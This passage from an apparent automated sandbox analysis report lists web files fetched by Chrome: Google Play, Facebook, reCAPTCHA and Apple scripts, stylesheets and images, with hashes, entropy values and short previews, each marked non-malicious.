                                                                                                                                                                                                                                  SHA-512:050AE8E9C1BDF67C0029A242840842918FC09CEEC14773565CDA51A9386DCD604124BFB73D1D6E008BA3667EE0874D1861FAB396AB0AD449DD4A378BC520DE76
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("UZStuc");._.qr(_.rAa,class extends _.rr{constructor(a){super(a.ta)}H(){return"UZStuc"}N(){return!0}Xa(){return _.q5}});_.$q.UZStuc=_.zz;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 36, 4-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):185
                                                                                                                                                                                                                                  Entropy (8bit):5.9780303893393345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:yionv//thPlSYLl+1IHCRsHrXLRa+dn/23rIIGU5thNnkncm3w4qtmkW7PXl0VMa:6v/lhP0YLkyymvVGtjnUnRq0kW7N0xVp
                                                                                                                                                                                                                                  MD5:07505E9DAC6DD922116F038EB58C9B88
                                                                                                                                                                                                                                  SHA1:4DAB9005E4603F76A6FAD92FE78FB9C92D05B62F
                                                                                                                                                                                                                                  SHA-256:C4DB75F643BB4DD47E39A9601FCC0A14621B588D5E4EBE987EE4828120BDE791
                                                                                                                                                                                                                                  SHA-512:5A94B97148037E9A25AF768AF67A1AD5D4959E5D5C216DC5353FB159630302A74A990CCA20F787C024C6B7229A12920B287A88A4063514FBA534E7D1DB094C11
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...$.....=k.9....PLTE"u.#t."s..OO.PP.OO.........o.......tRNSJ....J..J.j.\...DIDATx.c`T..ec$.. .].A...1..Z..!..%p.A....H...0......*.....]...Qp...al.....IEND.B`.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with very long lines (31220)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):50088
                                                                                                                                                                                                                                  Entropy (8bit):5.4168756881776705
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:QT3Cl3UR5FlxRBsVZI2r4vlroHKay9/KUbBfNfGg2TnDdQs5CNthxTB3eARGTB:CBbFlxRurPAYfWs5sB3m
                                                                                                                                                                                                                                  MD5:9923E44E3A1C3B76ACAFF0880CC06AB7
                                                                                                                                                                                                                                  SHA1:75FD70940452C4804CA6C6DF2A7BEF31ADC2BF82
                                                                                                                                                                                                                                  SHA-256:8726494E52BF0A93133D578698DEADE14D856A1836D8DF00CFC975E5FE1307E4
                                                                                                                                                                                                                                  SHA-512:A7F7EC56F98B3F77C9BAB8C44BC405D280A295AAEC10688534815B1FB9B49A68453B2039CA622D033E9C868E97FE9927EF5EC2C52F82C50AD74EBAB7F26468B6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3i6l24/yP/l/ru_RU/GcN06huceZG.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger")("async_dom").warn("Could not find relativeTo element for %s AsyncDOM operation based on selector: %s",f,g);switch(f){case"hide":b("CSS").hide(h);break;case"show":b("CSS").show(h);break;case"setContent":b("DOM").setContent(h,e);break;case"appendContent":b("DOM").appendContent(h,e);break;case"prependContent":b("DOM").prependContent(h,e);break;case"insertAfter":b("DOM").insertAfter(h,e);break;case"insertBefore":b("DOM").insertBefore(h,e);break;case"remove":b("DOM").remove(h);break;case"replace":b("DOM").replace(h,e);break;default:b("FBLogger")("async_dom").warn("Received invalid command %s for AsyncDOM operation",f)}}}};e.exports=a}),null);.__d("AsyncResponse",["invariant","Bootloader","FBLogger","HTML","WebDriverConfig"],(function(a,b
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):78840
                                                                                                                                                                                                                                  Entropy (8bit):6.022413301778022
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:OfGNbFoZJSUYOOaLnAW8+IcTOIlbuhXwW4nxM:mGRFauOxLA/+IcTOjX/
                                                                                                                                                                                                                                  MD5:0CA290F7801B0434CFE66A0F300A324C
                                                                                                                                                                                                                                  SHA1:0891B431E5F2671A211DDD8F03ACF1D07792F076
                                                                                                                                                                                                                                  SHA-256:0C613DC5F9E10DFF735C7A102433381C97B89C4A26CE26C78D9FFAD1ADDDC528
                                                                                                                                                                                                                                  SHA-512:AF70C75F30B08D731042C45091681B55E398EA6E6D96189BC9935CE25584A57240C678FF44C0C0428F93BF1F6A504E0558BC63F233D66D1B9A5B477BA1EF1533
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/styles__ltr.css
                                                                                                                                                                                                                                  Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (785)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1371
                                                                                                                                                                                                                                  Entropy (8bit):5.314499238164883
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:kzTorJWvwfRFm2L/IQXoAmGlj1LGbRhGbZ4m7N7EdeoWrmuteQlrl:ktvwbml8lj1LGbRhGbKm9EsLlrl
                                                                                                                                                                                                                                  MD5:FD9669022126462A1A7A463C89B5178B
                                                                                                                                                                                                                                  SHA1:1825419BB6E20D282FDD6ABABBE909E05D68059E
                                                                                                                                                                                                                                  SHA-256:53C0CC6781396AB657A891BA360B7E53C4473B19B669B79B05B89F869A7854F3
                                                                                                                                                                                                                                  SHA-512:F31BD5ACCA477B4F8C0B7C331F1017087F7845446E0ADD386478E6BFCD2DEA8021284E4C0E4DAE992FEDEF3C1018B9333C7A682DDD957F2B69897E1288218F5D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,GkRiKb,HnDLGf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gKWqec,gychg,hKSk3e,hc6Ubd,kJXwXb,kWgXee,kjKdXe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,rpbmN,s39S4,soHxf,tKHFxf,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=P6sQOc"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("P6sQOc");.var cab=!!(_.xf[3]&8);var eab=function(a){const b={};_.wa(a.ua(),e=>{b[e]=!0});const c=a.N(),d=a.na();return new dab(a.V(),_.jh(c,1)*1E3,a.H(),_.jh(d,1)*1E3,b)},fab=function(a){return Math.random()*Math.min(a.na*Math.pow(a.ka,a.H),a.ua)},QK=function(a,b){return a.H>=a.V?!1:b!=null?!!a.wa[b]:!0},dab=class{constructor(a,b,c,d,e){this.V=a;this.na=b;this.ka=c;this.ua=d;this.wa=e;this.H=0;this.N=fab(this)}};var gab=function(a,b,c,d){return c.then(e=>e,e=>{if(cab)if(e instanceof _.Xd){if(!e.status||!QK(d,e.status.H()))throw e;}else{if("function"==typeof _.dq&&e instanceof _.dq&&e.N!==103&&e.N!==7)throw e;}else if(!e.status||!QK(d,e.status.H()))throw e;return _.Sd(d.N).then(()=>{if(!QK(d))throw Error("Cc`"+d.V);++d.H;d.N=fab(d);b=_.gj(b,_.Via,d.H);return gab(a,b,a.fetch(b),d)})})};._.Eq(_.ALa,class extends _.Dq{static Ia(){return{service:{HO:_.aab,metadata:_.bab,l0:_.$$a}}}cons
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3003)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):18440
                                                                                                                                                                                                                                  Entropy (8bit):5.255534167782927
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:kz8E0CXVpU4y7FeTEkrHfcBkoNiIvYcaSRCF+q4nAHY+6dDlqW1hCSallZsWY:kz8E0CXVpU4y7ZkrHfcBkSiIvYc/Re+J
                                                                                                                                                                                                                                  MD5:5F765A4A59A407D5DAA33CC0B48F2A35
                                                                                                                                                                                                                                  SHA1:44E29FDCCC78BAD49465D30F2AD9D5DE816AE150
                                                                                                                                                                                                                                  SHA-256:5C98E1CF88ADBADBE52321041E084AA2D5BC4DAAFFBF8EC6C45A438E8D393202
                                                                                                                                                                                                                                  SHA-512:ABD01A44A94A0BE2B000DB5BB60A439AFDA8948B32B3F0685AC9AFE175EC9E3701C3747457BE42032C1EA0707AF02109D46187FCA39F2815BD8AEDBBD365F38C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/chunk.934.167974858ffab5c06580.js
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[934],{7934:function(e,t,r){r.r(t),r.d(t,{default:function(){return W}}).var n,o,a=r(32722),i=r(24178).function s(){return o||(o=["app","appVersion","hardwareFamily","hardwareModel","os","osBuildNumber","osLanguages","osVersion","resourceRevNum","screenHeight","screenWidth","userAgent"].concat(["delegateApp","hardwareBrand","storeFrontCountryCode","storeFrontHeader"])),o}var p,c=i.SC.attachDelegate,u=i.Z_.cryptoRandomBase62String,l=i.Z_.exceptionString.function m(e){this.setDelegate({topic:e}),p||(p=!0,s().forEach((function(e){m.prototype[e]=function(t){return t&&t.hasOwnProperty(e)?t[e]:this.environment()[e]()}})))}m._className="eventHandlers.base",m.prototype.setDelegate=function(e){return c(this,e)},m.prototype.topic=function(){throw l(m._className,"topic")},m.prototype.environment=function(){throw l(m._className,"environment")},m.prototype.eventRecorder=function(){throw l(m._className
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.216099607331256
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvn0kMaooe/AuGNG/QVIhWshiHDTTnGwQRaNw6JpyxZRNlad0:kRZTFJFjI/AIJij/DkbRN20
                                                                                                                                                                                                                                  MD5:29C607A45E479C4820DE227F5A5D7842
                                                                                                                                                                                                                                  SHA1:452ED988C4EF1FF2431E7A9A16E0D65CF7F46BA9
                                                                                                                                                                                                                                  SHA-256:A91C624686224B412768D79021C5A54375291814E63D2C276A33F8B468AF6E37
                                                                                                                                                                                                                                  SHA-512:281512242C48030BC488007167CD3D52469ABFCA3B8A003229AC3BF6717027DFF78D31680B9972B906D3F77681FFE1FF254202F45BD5DF7DE1133733A57A74AC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,ElYdAc,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,gychg,hKSk3e,hc6Ubd,iAQMie,kJXwXb,kWgXee,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=qczJ2b"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("qczJ2b");._.qr(_.eCa,class extends _.rr{constructor(a){super(a.ta)}H(){return"qczJ2b"}N(){return!0}Xa(){return _.ePc}});_.$q.qczJ2b=_.vRa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):35798
                                                                                                                                                                                                                                  Entropy (8bit):5.362239652266183
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:xLV9hhNz5ouQq7vDsCYDHlo+yg2GsGsgo4ST5dX4+eT7Fi8mR5lfKGiLHCWtvdTZ:e
                                                                                                                                                                                                                                  MD5:3AB3496A7BFE9321B3FA0E2FC8668B14
                                                                                                                                                                                                                                  SHA1:EC704CA797F15BCDC6DE9AF8AB9F8311EB82B2A4
                                                                                                                                                                                                                                  SHA-256:E321803AB120C94CFFB459955214D4F783D14653749A9D9E01D5E81C5358C8D4
                                                                                                                                                                                                                                  SHA-512:1DDAFCEB91F8AF68ADDE9686537147615BD504D38FE24FAC13007DA412A58686D633A09A2E629B79297A826524D10374058E1A1178684C45D43795A62992E63A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.apple.com/wss/fonts?families=SF+Pro,v2|SF+Pro+Icons,v1|SF+Pro+Rounded,v1|New+York+Small,v1|New+York+Medium,v1"
                                                                                                                                                                                                                                  Preview:@font-face {...font-family:'SF Pro Display';...font-style:normal;...font-weight:100;...src:local('.'), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight.ttf") format("truetype");.../* (C) 2015 Apple Inc. All rights reserved. */..}..@font-face {...font-family:'SF Pro Display';...font-style:italic;...font-weight:100;...src:local('.'), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight-italic.woff2") format("woff2"), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight-italic.woff") format("woff"), url("/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight-italic.ttf") format("truetype");.../* (C) 2015 Apple Inc. All rights reserved. */..}..@font-face {...font-family:'SF Pro Display 100';...src:url('/wss/fonts/SF-Pro-Display/v2/sf-pro-display_ultralight.eot');.../* (C) 2015 Apple Inc. All righ
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9961)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):45856
                                                                                                                                                                                                                                  Entropy (8bit):5.377886737524556
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:JXXiX4/HZecX8WlUPWnRFXJbflLtmvbPRAS3mjAvxfdxYOVl/tS:JCrcX8WlU8tltgpAS3mjyV+ElS
                                                                                                                                                                                                                                  MD5:476E8FABA1D7ADCD9E496FD9DC33B3C4
                                                                                                                                                                                                                                  SHA1:F21B31317EB534E73E5BFDD72F0583E6D8A5B06D
                                                                                                                                                                                                                                  SHA-256:716DB07ADC0E1F7318B14C1BE0EA61F84969E1B5A3562AE7366FB189383BF038
                                                                                                                                                                                                                                  SHA-512:B8371737A4428D3DC81A3C600BC8468780E5586371F107FFB739E22BD1144EFC764090850D81543E963884B9AA19CB708ED130D1F3B0DF6BE1955E4CE388A27B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3i_Ou4/yX/l/en_GB/UlpshyJeqkw.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:(i++).toString(36)}),this.$3=[]}var c=a.prototype;c.getID=function(){return this.$2.id};c.begin=function(){this.$2.begin=b("cr:9985")();return this};c.end=function(){this.$2.end=b("cr:9985")();return this};c.appendChild=function(){var a=this;this.$1&&h(0,37302,this.$2.description);for(var b=arguments.length,c=new Array(b),d=0;d<b;d++)c[d]=arguments[d];c.forEach(function(b){a.$3.push(b.getID())});return this};c.setPosted=function(){this.$1=!0;return this};c.getPostData=function(){return babelHelpers["extends"]({},this.$2,{id:this.$2.id,children:this.$3.slice()})};return a}();g["default"]=a}),98);.__d("ArtillerySequence",["invariant"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"description"in a||h(0,1497,
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (31470)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):45781
                                                                                                                                                                                                                                  Entropy (8bit):5.4005500598459015
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:xq9DvQPUjkEO1ayPW9ZybWRxatCvEAGm45TqZYu:OpjU1PbWRxatC4m45uZYu
                                                                                                                                                                                                                                  MD5:6126870CB22D062ABFAAEF09FF102DF5
                                                                                                                                                                                                                                  SHA1:92AF3022CC9C9BE309E42FFE0F450ED3E95CA622
                                                                                                                                                                                                                                  SHA-256:ED977AB797E2C2CD3EA3973E6A1A417CB0F0FA293CA6D9E0BE5B0D11FF3AC76F
                                                                                                                                                                                                                                  SHA-512:F34B46A7E2CFB84AE103870ADEEAD1B9E73E0DAEFA03D7E210B985C2098418680D1496509F1D8C9F85D565270DFC55DB0B74988E19EB4FA77637239CADF07C12
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("Wedge.art",["ReactART","create-react-class","prop-types","react"],(function(a,b,c,d,e,f){var g,h=g||b("react"),i=b("ReactART").Shape,j=b("ReactART").Path;a=b("create-react-class")({displayName:"Wedge",propTypes:{outerRadius:b("prop-types").number.isRequired,startAngle:b("prop-types").number.isRequired,endAngle:b("prop-types").number.isRequired,innerRadius:b("prop-types").number},circleRadians:Math.PI*2,radiansPerDegree:Math.PI/180,_degreesToRadians:function(a){if(a!==0&&a%360===0)return this.circleRadians;else return a*this.radiansPerDegree%this.circleRadians},_createCirclePath:function(a,b){var c=j();c.move(0,a).arc(a*2,0,a).arc(-a*2,0,a);b&&c.move(a-b,0).counterArc(b*2,0,b).counterArc(-b*2,0,b);c.close();return c},_createArcPath:function(a,b,c,d){var e=j();a=this._degreesToRadians(a);b=this._degreesToRadians(b);var f=a>b?this.circleRadians-a+b:b-a,g=Math.sin(a),h=Math.sin(b);a=Math.cos(a);b=Math.cos(b);var i=h-g,k=b-a,l=d-c;f=f>Math.PI;e.move(c+c*g,c-c*a).arc(
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10984
                                                                                                                                                                                                                                  Entropy (8bit):7.846913490532719
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:RTrqwnFSTc0/8DcTdvRaQlP13OsILGOTd5lu9wQ2fcGF7nnXRwnOIBpeDTJ5tiPM:xqISoyiQt15OTd/u9wQt+nX6p2p7
                                                                                                                                                                                                                                  MD5:640291AB704DE28AE9899ED978A0D738
                                                                                                                                                                                                                                  SHA1:66FD3E484C423E57FEFD352AC3D8C63B1CC0ED2C
                                                                                                                                                                                                                                  SHA-256:0F095CDFDF132A489749AE0E887B6F54F9642138249C3321E979CAFCE0C3030F
                                                                                                                                                                                                                                  SHA-512:B96060B581E92F4025F8CBB8F76ABD566506B692026590888517D0498E2DDEFB37733077BF687B7B5D445D751134375EC6186C5A99F7DDBB70A77983759E6784
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://i.ytimg.com/vi/kq5HPV5XpIY/hqdefault.jpg
                                                                                                                                                                                                                                  Preview:......JFIF................................. ..%.....'10-'--5=PB58K9+-EaEKSV[\[2AemdXlPY[W......./../W757WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW]WWW]WW......h....".......................................A........................!1.AQ.aq...."...2BR...#r.3Sb....5CDc.................................).......................!1.A.Q"2.aq.#...............?............................................................................................................................................................}c....O.{.B.(...}c....|..............>.>...../..^.>.....'.=..N......X.~.{....'Zu..jX...w.O...=..S.d.W.O.{.@....w.^..e.O..~....>.....d....RJ.P...\...w.^...:...W.....6}c....Y..._L`l|6i~hw~........_.._.P5..>....\..X.~.ze.MV :4.%i.,Ro.....n...I?.%...2.3.8.z..C.k....._.Jq_.1....6......bu..`..}..)u....`5{.....G..~..U....R...>.>..........=...u.8w~..]V.7.&.Xw~..a....:..7.&.Xw~.."..w.:.U................N............T....u.Z...O.{.@.d....i....O.{.@.d....i.....j~.w~.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                                                  Entropy (8bit):7.260242399614157
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:Ok5ZTz+FyXIzvulGnFYqS8R85GZTb0FvSowvpbRcp2gHNuXmr4ntIyJtoTwO3byl:LzSAXIzvu4FYqU8ZX0F6owRcp2rsAtM4
                                                                                                                                                                                                                                  MD5:6A4B15D70049AD2B6B2F67CDF08C885D
                                                                                                                                                                                                                                  SHA1:A52320107374D519D13397D2172236F4526EB7E6
                                                                                                                                                                                                                                  SHA-256:6213DCD17B474412DADFCF36A834F53E185A8DE8F9355AA51C632F6A025E0B20
                                                                                                                                                                                                                                  SHA-512:8002BE9302A602D66746EC7B8A0DE89BD27E58938EBAD206C90FAAC00898D44D29BA6F699A8CBC4A20BEE42013E69B896ABF17BAFBB83A29658FBC1B81D14BF5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
